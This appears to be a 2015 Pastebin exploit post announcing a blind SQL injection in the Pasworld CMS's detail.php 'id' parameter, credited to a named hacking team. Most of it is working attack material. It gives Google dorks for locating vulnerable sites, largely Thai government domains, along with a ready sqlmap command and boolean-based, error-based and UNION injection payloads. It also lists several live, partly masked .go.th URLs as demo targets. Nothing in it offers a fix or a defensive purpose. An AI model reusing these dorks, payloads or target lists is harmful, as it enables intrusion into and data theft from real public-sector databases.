API tools faq
paste
Advertisement
Guest User

Pasworld detail.php Blind Sql Injection Vulnerability

a guest
Jun 5th, 2015
326
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.65 KB | None | 0 0
raw download clone embed print report
  1. =========================================================
  2.  
  3. [+] Title :- Pasworld detail.php Blind Sql Injection Vulnerability
  4. [+] Date :- 5 - June - 2015
  5. [+] Vendor Homepage: :- http://main.pasworld.co.th/
  6. [+] Version :- All Versions
  7. [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
  8. [+] Category :- webapps
  9. [+] Google Dorks :- intext:"Powered By :: PAS World Communitcation" inurl:detail.php
  10. site:go.th inurl:"detail.php?id="
  11. [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
  12. [+] Team name :- Team Alastor Breeze
  13. [+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
  14. [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha
  15. [+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
  16.  
  17. =========================================================
  18.  
  19. [+] Severity Level :- High
  20. [+] Request Method(s) :- GET / POST
  21. [+] Vulnerable Parameter(s) :- detail.php?id=
  22. [+] Affected Area(s) :- Entire admin, database, Server
  23.  
  24.  
  25. =========================================================
  26.  
  27. [+] About :- Unauthenticated SQL Injection via "detail.php?id=" parameter
  28.  
  29. [+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php
  30.  
  31. [+] POC :- http://127.0.0.1/detail.php?id=[SQL]'
  32.  
  33. SQLMap
  34. ++++++++++++++++++++++++++
  35. python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs
  36. ++++++++++++++++++++++++++
  37.  
  38. Parameter: id (GET)
  39. Type: boolean-based blind
  40. Title: AND boolean-based blind - WHERE or HAVING clause
  41. Payload: id=152 AND 1414=1414
  42.  
  43. Type: error-based
  44. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  45. Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  46.  
  47. Type: UNION query
  48. Title: MySQL UNION query (random number) - 9 columns
  49. Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982#
  50.  
  51.  
  52. [+] DEMO :- http://www.nXeunsri.go.th/detail.php?id=16%27
  53. http://www.satoXo.th/detail.php?id=39%27
  54. http://www.namXb.go.th/detail.php?id=8%27
  55. http://www.saopXjan.go.th/news/detail.php?id=1%27
  56. http://www.wangXaichan.go.th/detail.php?id=11
  57. http://www.suaXluay.go.th/detail.php?id=10%27
  58.  
  59. =========================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!